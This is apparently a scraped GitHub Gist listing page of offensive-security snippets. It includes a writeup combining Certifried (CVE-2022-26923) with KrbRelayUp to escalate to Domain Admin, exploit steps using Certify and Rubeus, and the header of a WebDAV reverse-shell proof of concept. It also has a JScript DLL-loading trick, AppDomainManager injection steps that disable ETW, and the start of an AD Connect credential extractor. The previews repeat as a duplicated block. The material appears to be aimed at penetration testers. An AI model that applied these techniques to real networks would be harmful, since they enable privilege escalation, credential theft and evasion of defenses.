Steve Borosh rvrsh3ll

## certifried_with_krbrelayup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rvrsh3ll
                / certifried_with_krbrelayup.md
            
            
              Created
              May 17, 2022 01:16
                — forked from tothi/certifried_with_krbrelayup.md
            
              
                Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
              
          
    Certifried combined with KrbRelayUp


Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts
or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user
on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged
domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:

  
## Program.cs
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

// Steps:
// 1.       Escalate on any workstation (hint: krbrelayup ftw)
// 2.       Execute UpdateMachineAccount.exe as SYSTEM
// 3.       Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4.       Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)

## JEWebDav.ps1
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>

<#
  .SYNOPSIS

  Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.

  Read And Write Files Over WebDAV Proof Of Concept

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## payloads-to-s3.sh
#! /bin/bash
# Tony Karre
# @tonykarre
#
# payloads-to-s3.sh
#
# Use case:
#
#  You are executing a pen test, and you want to temporarily stage payloads and other tools
#  on a server outside of your own infrastructure.  You also want to make sure that

## mac-bruteforce.py
import time
from itertools import product
import sys
from scapy.all import *

prefixes = ['001122','445566']
timeout = 10
breakcounter = 255
iface = 'eth0'

## sc.js
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test


new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP

var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> 	<file name="dynwrapx.dll">     	<comClass         	description="DynamicWrapperX Class"         	clsid="{89565276-A714-4a43-912E-978B935EDCCC}"         	threadingModel="Both"         	progid="DynamicWrapperX"/> 	</file>  </assembly>';

## .screenrc
# the following two lines give a two-line status, with the current window highlighted
hardstatus alwayslastline
hardstatus string '%{= kG}[%{G}%H%? %1`%?%{g}][%= %{= kw}%-w%{+b yk} %n*%t%?(%u)%? %{-}%+w %=%{g}][%{B}%m/%d %{W}%C%A%{g}]'

# huge scrollback buffer
defscrollback 5000

# no welcome message
startup_message off

## README.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rvrsh3ll
                / README.md
            
            
              Created
              January 26, 2022 00:14
            
              
                Remote AppDomainManager Injection
              
          
    This is a variation of the technique originally discovered by subtee and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
Host test.dll on a remote SMB or HTTP(S) server


## azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return
	// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
	// Author: @domchell - MDSec
	// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
	// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

	// Steps:
	// 1. Escalate on any workstation (hint: krbrelayup ftw)
	// 2. Execute UpdateMachineAccount.exe as SYSTEM
	// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
	// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
	<#
	Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
	#>

	<#
	.SYNOPSIS

	Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.

	Read And Write Files Over WebDAV Proof Of Concept
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	#! /bin/bash
	# Tony Karre
	# @tonykarre
	#
	# payloads-to-s3.sh
	#
	# Use case:
	#
	# You are executing a pen test, and you want to temporarily stage payloads and other tools
	# on a server outside of your own infrastructure. You also want to make sure that
	import time
	from itertools import product
	import sys
	from scapy.all import *

	prefixes = ['001122','445566']
	timeout = 10
	breakcounter = 255
	iface = 'eth0'
	//Example Reference:
	// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
	// Test


	new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
	// Change that C:\\Tools to a location you specify, or dynamically find current directory.
	// ActCTX will search for the DLL in TMP

	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
	# the following two lines give a two-line status, with the current window highlighted
	hardstatus alwayslastline
	hardstatus string '%{= kG}[%{G}%H%? %1`%?%{g}][%= %{= kw}%-w%{+b yk} %n*%t%?(%u)%? %{-}%+w %=%{g}][%{B}%m/%d %{W}%C%A%{g}]'

	# huge scrollback buffer
	defscrollback 5000

	# no welcome message
	startup_message off
	Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
	Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

	$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

	try {
	$client.Open()
	} catch {
	Write-Host "[!] Could not connect to localdb..."
	return